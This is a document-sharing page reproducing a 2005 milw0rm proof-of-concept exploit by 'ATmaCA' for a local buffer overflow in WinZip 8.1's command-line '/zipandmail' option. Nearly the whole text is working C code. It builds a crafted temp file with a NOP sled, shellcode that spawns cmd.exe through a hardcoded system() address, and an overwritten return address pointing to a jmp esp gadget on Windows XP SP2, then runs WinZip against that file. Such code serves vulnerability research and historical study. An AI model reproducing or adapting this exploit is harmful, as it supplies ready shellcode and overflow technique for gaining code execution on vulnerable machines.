WinZIP 8.1 Command Line Local Buffer Overflow Exploit

Report as inappropriate Your report has been received

Shared by: h3m4n

Tags

WinZip 8.1, WinZip 8.0, winzip 8, WinZip Computing, free winzip, 8 1, Zip files, Zip file, WinZip 8.1 SR-1, Windows XP

Stats

views:: 63
posted:: 5/23/2010
language:: English
pages:: 2

Public Domain

Document Sample

							                           WinZIP 8.1 Command Line Local Buffer Overflow Exploit   Page 1/2
  1   /*
  2   *
  3   * WinZip Command Line Local Buffer Overflow
  4   * http://securitytracker.com/alerts/2004/Sep/1011132.html
  5   * http://www.winzip.com/wz90sr1.htm
  6   * Exploit coded By ATmaCA
  7   * Web: atmacasoft.com && spyinstructors.com
  8   * E−Mail: atmaca@icqmail.com
  9   * Credit to kozan
 10   *
 11   */
 12
 13   /*
 14   *
 15   * Tested with WinZip 8.1 on Win XP Sp2 En
 16   * Bug Fixed on WinZip 9.0 Service Release 1 (SR−1)
 17   * http://www.winzip.com/wz90sr1.htm
 18   *
 19   */
 20
 21   #include <windows.h>
 22   #include <stdio.h>
 23
 24   #define NOP 0x90
 25
 26   void main()
 27   {
 28           // create crafted command line
 29           char tmpfile[] = "c:\\wzs45.tmp";
 30           char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
 31           char zipandmailpar[] = " −* /zipandmail /@ ";
 32           char runpar[300];
 33           int i = 0;
 34           strcpy(runpar,winzippath);
 35           strcat(runpar,zipandmailpar);
 36           strcat(runpar,tmpfile);
 37
 38            // need for some input file name .tmp but not must to exist
 39            char inputfile[] = "C:\\someinputfile.ext\n";
 40
 41            // launch a local cmd.exe
 42            char shellcode[] =
 43            "\x55\x8B\xEC\x33\xFF"
 44            "\x57\x83\xEC\x04\xC6\x45\xF8"
 45            "\x63\xC6\x45\xF9\x6D\xC6\x45"
 46            "\xFA\x64\xC6\x45\xFB\x2E\xC6"
 47            "\x45\xFC\x65\xC6\x45\xFD\x78"
 48            "\xC6\x45\xFE\x65\xB8"
 49            "\xC7\x93\xC2\x77" //77C293C7 system() − WinXP SP2 − msvcrt.dll
 50            "\x50\x8D\x45\xF8\x50"
 51            "\xFF\x55\xF4";
 52

ATmaCA                                                                             06/07/2005
                         WinZIP 8.1 Command Line Local Buffer Overflow Exploit       Page 2/2
 53           // create crafted .tmp file
 54           FILE *di;
 55           if( (di=fopen(tmpfile,"wb")) == NULL ){
 56                   return;
 57           }
 58
 59           for(i=0;i<sizeof(inputfile)−1;i++)
 60                   fputc(inputfile[i],di);
 61
 62           fprintf(di,"c:\\");
 63
 64           for(i=0;i<384;i++)
 65                   fputc(NOP,di);
 66
 67
 68           for(i=0;i<sizeof(shellcode)−1;i++)
 69                   fputc(shellcode[i],di);
 70
 71           fprintf(di,"\xBF\xAC\xDA\x77"); //EIP − WinXp Sp2 Eng − jmp esp addr
 72           fprintf(di,"\x90\x90\x90\x90"); //NOPs
 73           fprintf(di,"\x90\x83\xEC\x74"); //sub esp,0x74
 74           fprintf(di,"\xFF\xE4\x90\x90"); //jmp esp
 75
 76           fprintf(di,"\n");
 77
 78           fclose(di);
 79           WinExec(runpar,SW_SHOW);
 80   }
 81
 82   // milw0rm.com [2005−06−07]




ATmaCA                                                                               06/07/2005